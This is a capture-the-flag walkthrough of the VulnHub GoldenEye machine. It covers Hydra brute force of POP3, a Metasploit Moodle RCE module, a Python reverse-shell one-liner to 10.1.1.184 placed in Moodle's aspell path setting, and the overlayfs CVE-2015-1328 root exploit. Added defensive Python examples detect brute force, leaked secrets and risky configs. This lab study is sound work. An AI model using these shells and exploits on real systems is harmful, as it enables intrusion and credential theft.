vulnhub_goldeneye
forg12

Overview

  1. Information gathering yields the Moodle admin password
  2. With Moodle admin rights, get a shell through CVE-2013-3630
  3. Local privilege escalation with CVE-2015-1328

Information gathering

Find the target's IP

nmap -sP 192.168.56.0/24

Nmap scan report for 192.168.56.103
Host is up (0.40s latency).

Port and service scan

Scan all ports, then gather details of the services found.

nmap -p- 192.168.56.103

PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown


nmap -sS -sV -T5 -p25,53,80,55006,55007 192.168.56.103

PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
53/tcp open domain dnsmasq 2.81
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open ssl/pop3 Dovecot pop3d
55007/tcp open pop3 Dovecot pop3d

Port 80

Browse to /sev-home.

View the page source.

Open terminal.js, which contains this comment block:

//Boris, make sure you update your default password. 
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes

HTML-decode

The value in the comment is HTML entity encoded; decoding it gives the password.

Information gathered

name:
Boris
Natalya
pwd:
InvincibleHack3r

Authenticating to /sev-home

With these hints, the login prompt on /sev-home accepts:

boris/InvincibleHack3r

The page behind it reads:

<h1>GoldenEye</h1>
<p>GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO) </p>
<p>Please email a qualified GNO supervisor to receive the online <b>GoldenEye Operators Training</b> to become an Administrator of the GoldenEye system</p>
<p>Remember, since <b><i>security by obscurity</i></b> is very effective, we have configured our pop3 service to run on a very high non-default port</p>
</div>

Ports 55006 and 55007

Use nmap to get details of the services listening on these two ports.

┌──(kali㉿Kali)-[~]
└─$ nmap -p55006,55007 -sV -A -T4 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.34s latency).

PORT STATE SERVICE VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE USER SASL(PLAIN) PIPELINING RESP-CODES UIDL CAPA TOP STLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.45 seconds

The scan shows that both ports serve POP3 mail. Given the hint in terminal.js, Boris may still be using a default password on the mail service.

Brute-forcing POP3 with Hydra

From the hints, the collected username list is:

boris
natalya
hydra -L name.txt -P /usr/share/wordlists/fasttrack.txt 192.168.56.103 -s 55007 pop3

[55007][pop3] host: 192.168.56.103 login: boris password: secret1!
[55007][pop3] host: 192.168.56.103 login: natalya password: bird

1 of 1 target successfully completed, 2 valid passwords found

Hydra yields passwords for both accounts; the next step is to collect information from them. Using nc to

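As an added example (not from the original write-up), this is the detection side of the brute force above: it parses Dovecot pop3-login log lines and flags a source that fails authentication repeatedly within a short window. The log lines are constructed to follow Dovecot's format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Dovecot pop3-login disconnect lines; "auth failed" in the reason marks a
# bad password attempt.  rip = remote IP, lip = local IP.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"Disconnected \((?P<reason>[^)]*)\): user=<(?P<user>[^>]*)>, "
    r".*?rip=(?P<rip>[\d.]+), lip=(?P<lip>[\d.]+)"
)

def parse_line(line, year=2022):
    """Return a dict for a pop3-login disconnect line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "reason": m["reason"], "user": m["user"],
            "rip": m["rip"], "lip": m["lip"]}

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Map (rip, lip) -> {'failures', 'users'} for every source that produced
    at least `threshold` auth failures inside some `window`-long interval."""
    per_source = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and "auth failed" in ev["reason"]:
            per_source[(ev["rip"], ev["lip"])].append(ev)
    alerts = {}
    for key, evs in per_source.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):          # sliding window over sorted events
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[key] = {"failures": len(evs),
                               "users": sorted({e["user"] for e in evs})}
                break
    return alerts

# Constructed sample: one client cycling two usernames against the Dovecot
# instance on 192.168.56.103, plus one unrelated successful login.
SAMPLE = [
    f"Aug  4 14:00:{i * 6:02d} ubuntu dovecot: pop3-login: Disconnected "
    f"(auth failed, 1 attempts in 2 secs): user=<{u}>, method=PLAIN, "
    f"rip=192.168.56.1, lip=192.168.56.103, session=<s{i}>"
    for i, u in enumerate(["boris", "natalya"] * 4)
] + ["Aug  4 14:05:00 ubuntu dovecot: pop3-login: Login: user=<doak>, "
     "method=PLAIN, rip=192.168.56.50, lip=192.168.56.103, mpid=1234"]

if __name__ == "__main__":
    for (rip, lip), a in detect_bruteforce(SAMPLE).items():
        print(f"{rip} -> {lip}: {a['failures']} failures, users {a['users']}")
```

Point it at /var/log/mail.log (or the journal) and tune threshold and window to the site's normal failure rate.
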
The boris account

nc 192.168.56.103 55007
+OK GoldenEye POP3 Electronic-Mail System

user boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

The natalya account

nc 192.168.56.103 55007
use+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

Key information extracted

username:xenia
password:RCP90rulez!
domain:severnaya-station.com
URL:severnaya-station.com/gnocertdir

Visiting severnaya-station.com/gnocertdir

Edit the hosts file

As the mail instructs, first map severnaya-station.com to the target IP in /etc/hosts, then visit the URL from the mail.

Login URL

http://severnaya-station.com/gnocertdir/login/index.php

Try logging in with the credentials obtained earlier.

xenia/RCP90rulez!

The inbox holds a single message:

Greetings Xenia,
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.
My email username is...
doak
Thank you,
Cheers,
Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.

POP3: brute-forcing user doak

Nothing else useful turns up; the only new lead is the username doak, so return to port 55007 and brute-force that account.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.103:55007

[55007][pop3] host: 192.168.56.103 login: doak password: goat

The doak account

nc 192.168.56.103 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

Following the hint, log in to the training site with the credentials from this mail.

Logging in to the site as dr_doak

After logging in, a file s3cret.txt appears on the right; click it to download.

s3cret.txt reads (translated):

007,

I was able to capture this app's adm1n cr3ds in clear txt.

Text in most web apps on the GoldenEye servers is scanned, so I cannot add the cr3dentials here.

The juicy stuff is here: /dir007key/for-007.jpg

As you probably know, the RCP-90 is vastly superior to any other weapon, and License to Kill is the only way to play.

for-007.jpg

That is a useful lead; fetch the image.

http://severnaya-station.com/dir007key/for-007.jpg

The picture itself shows nothing useful, so download it and analyse the file.

wget http://severnaya-station.com/dir007key/for-007.jpg

strings for-007.jpg
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
GoldenEye
linux
For James
0231
0100
ASCII
For 007
""""""""""
! !!! !!!!!!!!"""""""""""""""
......

Base64 decode:

echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!

The note said the admin credentials had been captured in clear text and stashed in this image, so the base64-decoded string is the application's admin password.

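The three credential leaks that make up this box (an HTML-entity-encoded password in a JS comment, username/password pairs in mail bodies, and a base64 token inside the JPEG's strings) are the kind of thing a secrets scanner should catch before an attacker does. This scanner is an added example, not part of the original write-up; its inputs are constructed to mirror those three artefacts.

```python
import base64
import html
import re
import string

# "username: xenia" / "password: RCP90rulez!" lines as seen in the mail bodies.
CRED_RE = re.compile(r"(?im)^[ \t]*(user(?:name)?|login|pass(?:word)?|pwd)[ \t]*[:=][ \t]*(\S+)")
# Runs of four or more numeric character references, as in terminal.js.
ENTITY_RE = re.compile(r"(?:&#x?[0-9a-fA-F]+;){4,}")
# Standalone base64-looking tokens, as in the `strings` output of the JPEG.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")
PRINTABLE = set(string.printable) - set("\x0b\x0c")

def _as_printable(data):
    """Return data as str if it is entirely printable ASCII, else None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(c in PRINTABLE for c in text) else None

def scan(text):
    """Return (kind, evidence, decoded) findings for one text artefact."""
    findings = []
    for m in ENTITY_RE.finditer(text):
        findings.append(("html-entities", m.group(0), html.unescape(m.group(0))))
    for m in CRED_RE.finditer(text):
        findings.append(("plaintext-credential", m.group(0).strip(), m.group(2)))
    for m in B64_RE.finditer(text):
        token = m.group(0)
        if len(token) % 4:          # only well-formed (padded) base64
            continue
        try:
            decoded = _as_printable(base64.b64decode(token, validate=True))
        except ValueError:
            continue
        if decoded:                 # random binary rarely decodes to clean text
            findings.append(("base64", token, decoded))
    return findings

# Constructed samples modelled on the three leaks in this box.
SAMPLES = {
    "terminal.js": "//I encoded you p@ssword below...\n//\n"
                   "//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;"
                   "&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;\n",
    "mail": "Ok, user creds are:\n\nusername: xenia\npassword: RCP90rulez!\n",
    "strings for-007.jpg": "JFIF\nExif\neFdpbnRlcjE5OTV4IQ==\nGoldenEye\nFor 007\n",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        for kind, evidence, decoded in scan(text):
            print(f"{name}: {kind}: {evidence!r} -> {decoded!r}")
```
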
Exploitation: CVE-2013-3630

Method 1: MSF

After identifying the CMS (Moodle) and its version, search for vulnerabilities affecting that version.

Metasploit has a matching module, but repeated attempts failed; it turned out the module requires the PSpellShell spell engine to be selected.

Shell engine

Change this setting in the web application:

Home - Site administration - Plugins - Text editors - TinyMCE HTML editor - PSpellShell

msfconsole

msfconsole 
use exploit/multi/http/moodle_spelling_binary_rce
set username admin
set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set payload cmd/unix/reverse
set lhost 10.1.1.184
exploit

Method 2: manual trigger

The manual route also requires the spell engine change above.

Path to aspell

Home - Site administration - Server - System paths

Set this field to a Python reverse-shell command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.1.1.184",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Toggle spellchecker

Home - My profile - Blogs - Add a new entry

Clicking that button runs the command configured above and sends back a shell.

Shell received

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
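
Both methods above hinge on two admin-editable Moodle settings: the TinyMCE spell engine and the server-side Path to aspell. As an added example (not Moodle's code), this check audits those settings from a captured config; the setting names spellengine and aspellpath are assumed from the admin-UI labels, and the configs below are constructed.

```python
import os
import re
import shlex

# Characters that have no business in a path to an aspell binary.
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")

def audit_spellcheck(cfg, exists=os.path.isfile,
                     executable=lambda p: os.access(p, os.X_OK)):
    """Return (severity, message) findings for a dict of Moodle settings.
    `exists`/`executable` are injectable so captured configs can be checked
    off-box (assumed setting names: 'spellengine', 'aspellpath')."""
    findings = []
    if cfg.get("spellengine") == "PSpellShell":
        findings.append(("medium", "spell engine is PSpellShell: the web server runs "
                                   "the configured aspell path as a shell command"))
    path = cfg.get("aspellpath", "")
    if not path:
        return findings
    if SHELL_META.search(path):
        findings.append(("high", f"aspell path contains shell metacharacters: {path!r}"))
        return findings
    argv = shlex.split(path)
    prog = argv[0] if argv else ""
    if not os.path.isabs(prog):
        findings.append(("high", f"aspell path is not absolute: {prog!r}"))
    elif not exists(prog):
        findings.append(("high", f"aspell path does not exist: {prog!r}"))
    elif not executable(prog):
        findings.append(("medium", f"aspell path is not executable: {prog!r}"))
    elif os.path.basename(prog) != "aspell":
        findings.append(("high", f"aspell path points at a non-aspell binary: {prog!r}"))
    return findings

# Constructed configs: the shape left behind by the steps above (with a
# harmless placeholder command) and the safe shape.
WEAK = {"spellengine": "PSpellShell", "aspellpath": "python -c 'print(1)'"}
HARDENED = {"spellengine": "", "aspellpath": "/usr/bin/aspell"}

if __name__ == "__main__":
    fake_fs = dict(exists=lambda p: p == "/usr/bin/aspell",
                   executable=lambda p: p == "/usr/bin/aspell")
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_spellcheck(cfg, **fake_fs) or "no findings")
```

Run it periodically over the live config, and treat any change to these two settings as a high-priority event, since only an administrator can make it.
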

Privilege escalation

Check the kernel version

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU

Search for exploits for this kernel version

overlayfs local privilege escalation

overlayfs is a union filesystem that stacks one filesystem on top of another. Mainline Linux has supported overlayfs since kernel 3.18; Ubuntu kernels added it much earlier.

The overlayfs implementation in Ubuntu kernels has a permission-check flaw that lets an unprivileged local user gain administrator rights. It affected every Ubuntu release officially supported at the time; exploit code was public, and affected users were advised to upgrade promptly.

The flaw is that overlayfs does not check file permissions correctly when creating a new file in the upper filesystem directory. It only checks whether the owner of the file being modified may write to the upper directory, so when a file is copied from the lower directory to the upper one its attributes are copied along with it. If the kernel is built with CONFIG_USER_NS=y and overlayfs carries the FS_USERNS_MOUNT flag, an ordinary user can mount overlayfs inside a low-privilege user namespace. A local user can thus create new files in sensitive system directories or read sensitive files, and escalate to administrator rights.

Per the exploit's notes, drop the source file on the target, compile it with gcc and run the binary to become root.

exploits-37292

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ gcc 37292.c -o exp
gcc 37292.c -o exp
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

gcc is not installed, so compile with cc instead; the exploit source also calls gcc, so that call must be changed to cc as well.

Upload the modified file to the target with msf, then compile it with cc.

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cc 37292.c -o exp
cc 37292.c -o exp
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ls
ls
37292.c config.php editor_plugin_src.js includes
changelog.txt css exp rpc.php
classes editor_plugin.js img
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
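
The paragraphs above name the preconditions for CVE-2015-1328 (CONFIG_USER_NS=y and unprivileged user-namespace mounts of overlayfs), and the run above shows the artefact the exploit leaves, /etc/ld.so.preload. As an added example (not from the original post or the exploit), this audit checks both from captured text; the sysctl name kernel.unprivileged_userns_clone is the Ubuntu/Debian one and is assumed, and the samples are constructed.

```python
import re

# Ubuntu/Debian-specific sysctl (assumed name); absent on other kernels.
USERNS_SYSCTL = "/proc/sys/kernel/unprivileged_userns_clone"
# Library locations a root-managed ld.so.preload would normally point into.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

def audit_overlayfs_preconditions(kconfig, userns_clone):
    """kconfig: text of /boot/config-$(uname -r).  userns_clone: integer
    value of USERNS_SYSCTL, or None when the kernel does not expose it (then
    user namespaces are assumed usable whenever CONFIG_USER_NS=y).
    Returns a list of (severity, message)."""
    findings = []
    user_ns = re.search(r"^CONFIG_USER_NS=y$", kconfig, re.M) is not None
    # Ubuntu's early overlayfs used CONFIG_OVERLAYFS_FS; mainline uses CONFIG_OVERLAY_FS.
    overlay = re.search(r"^CONFIG_OVERLAY(?:FS)?_FS=[ym]$", kconfig, re.M)
    userns_open = user_ns and userns_clone in (None, 1)
    if userns_open:
        findings.append(("high", "unprivileged users can create user namespaces"))
    if overlay:
        findings.append(("info", f"overlayfs is enabled: {overlay.group(0)}"))
    if userns_open and overlay:
        findings.append(("high", "unprivileged overlayfs mounts are possible in a user "
                                 "namespace; patch the kernel or set "
                                 "kernel.unprivileged_userns_clone=0"))
    return findings

def audit_ld_preload(content):
    """content: text of /etc/ld.so.preload, or None if the file is absent.
    ld.so.preload is loaded into every dynamically linked process, and a
    stock server has no such file, so its presence alone deserves a look."""
    if content is None:
        return []
    findings = [("medium", "/etc/ld.so.preload exists")]
    for lib in content.split():
        if not lib.startswith(TRUSTED_LIB_DIRS):
            findings.append(("high", f"preloaded library outside system lib dirs: {lib}"))
    return findings

# Constructed samples: a config matching the preconditions above, and a hardened one.
KCONFIG_OPEN = "CONFIG_USER_NS=y\nCONFIG_OVERLAYFS_FS=y\n"
KCONFIG_HARD = "# CONFIG_USER_NS is not set\nCONFIG_OVERLAYFS_FS=y\n"

if __name__ == "__main__":
    print(audit_overlayfs_preconditions(KCONFIG_OPEN, None))
    print(audit_overlayfs_preconditions(KCONFIG_HARD, None))
    print(audit_ld_preload("/tmp/not-a-system-lib.so\n"))
```
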

cat flag

# cd /root
cd /root
# ls
ls
# ls -la
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

#

Visiting /006-final/xvf7-flag/

The final page reads (translated):

Flag captured
Congratulations *******************************
You captured the codes and stopped Alec Trevelyan from carrying out his invincible revenge!!!!
****************************************